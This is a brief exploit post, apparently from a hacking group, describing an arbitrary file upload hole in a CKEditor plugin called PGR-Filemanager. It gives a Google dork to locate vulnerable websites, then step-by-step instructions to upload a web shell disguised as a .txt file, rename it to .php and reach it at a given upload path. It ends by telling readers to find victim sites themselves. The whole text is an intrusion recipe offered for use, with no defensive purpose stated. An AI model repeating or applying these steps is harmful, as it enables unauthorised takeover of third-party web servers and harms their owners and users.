Exploit Title : PGR-Filemanager | Arbitrary File Upload
# Vendor Homepage : N/A
# Discovered By : KimiHmei7
# Author Homepage : HTTPS://TEGALSEC.ORG
# Google Dork : inurl:/plugins/pgrfilemanager/
# Step by Step
1. Dorking on google for find site
2. Add this exploit /PGRFileManager.php .
example: ~ https://site.com/public/js/ckeditor/plugins/pgrfilemanager/PGRFileManager.php
If you see File Uploader mean that site is vulnerable.
3. Upload shell with extension .txt
example : ~ shell.txt
4. Then rename into php extension.
5. You can find your shell in directory /public/upload/[folder]/shell.php
example : https://site.com/public/upload/[folder]/shell.php
# Demo?
No demo. Find vulnerable sites with your brain!
Greetz : Family Attack Cyber - Tegal1337